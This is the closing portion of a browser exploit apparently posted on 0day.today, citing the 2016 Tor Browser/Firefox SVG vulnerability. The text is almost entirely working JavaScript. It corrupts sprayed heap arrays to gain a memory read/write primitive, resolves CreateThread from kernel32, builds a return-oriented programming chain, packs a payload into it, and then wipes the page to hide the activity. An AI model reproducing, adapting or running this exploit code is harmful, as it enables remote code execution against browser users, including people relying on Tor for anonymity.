for(offset=0;offset<spr[i].length;offset+=512)
if("object" != typeof spr[i][offset+1]) {
memarrayloc=doubleFromFloat(spr[i][offset+1],0);
arr_index=i;
arr_offset=offset;
spr[i][offset+(o2+0)/8]=qword2Double(65,0);
spr[i][offset+(o2+8)/8]=qword2Double(arrBase+o3,memarrayloc+27);
for(j=0;33>j;j++)
spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27);
spr[i][offset+(o3+8)/8]=qword2Double(0,0);
spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0);
spr[i][offset+(o7+168)/8]=qword2Double(0,3);
spr[i][offset+(o7+88)/8]=qword2Double(0,2);
break
}
for(;memory.length==len;);
// From here `memory` is the read window: wrap it in Memory (reads are
// memory[b/4]), pull a pointer from memarrayloc+12 to seed PE/ROP, and
// obtain the chain buffer's backing address by briefly storing ropArrBuf in
// the found slot and reading it back through the primitive.
var mem=new Memory(memarrayloc+48,
function(b){return memory[b/4]},
function(b,a){memory[b/4]=a}),
xulPtr=mem.readDword(memarrayloc+12);
spr[arr_index][arr_offset+1]=ropArrBuf;
ropPtr=mem.readDword(arrBase+8);
spr[arr_index][arr_offset+1]=null;
ropBase=mem.readDword(ropPtr+16);
var rop=new ROP(mem,xulPtr);
rop.ropChain(ropBase,vtable_offset,10,ropArrBuf);
var backupESP=rop.findSequence([137,1,195]), ropChain=new Uint32Array(ropArrBuf);
ropChain[0]=backupESP;
// Second kernel32 import resolved from the same module's import table.
CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");
// Find the 0xCCCCCCCC terminator written by ropChain(), then append the
// fixed constants, the CreateThread address, and the payload repacked two
// code units per word.
for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++);
ropChain[i++]=3296825488;
ropChain[i++]=2048;
ropChain[i++]=1347469361;
ropChain[i++]=1528949584;
ropChain[i++]=3092271187;
ropChain[i++]=CreateThread;
ropChain[i++]=3096498431;
ropChain[i++]=arrBase+16;
ropChain[i++]=1955274891;
ropChain[i++]=280697892;
ropChain[i++]=704643071;
ropChain[i++]=2425406428;
ropChain[i++]=4294957800;
ropChain[i++]=2425393407;
for (var j=0;j<thecode.length;j+=2)
ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeAt(j+1);
// Final in-place rewrites of the found slot, then the second and last
// message to the page; the page's replacement onmessage handler reacts to
// it by wiping the DOM and terminating this worker after one second.
spr[arr_index][arr_offset]=qword2Double(arrBase+16,0);
spr[arr_index][arr_offset+3]=qword2Double(0,256);
spr[arr_index][arr_offset+2]=qword2Double(ropBase,0);
spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3);
spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2);
postMessage("GREAT SUCCESS");
};

References:

https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html
https://www.kb.cert.org/vuls/id/791496

#  0day.today [2018-03-28]  #
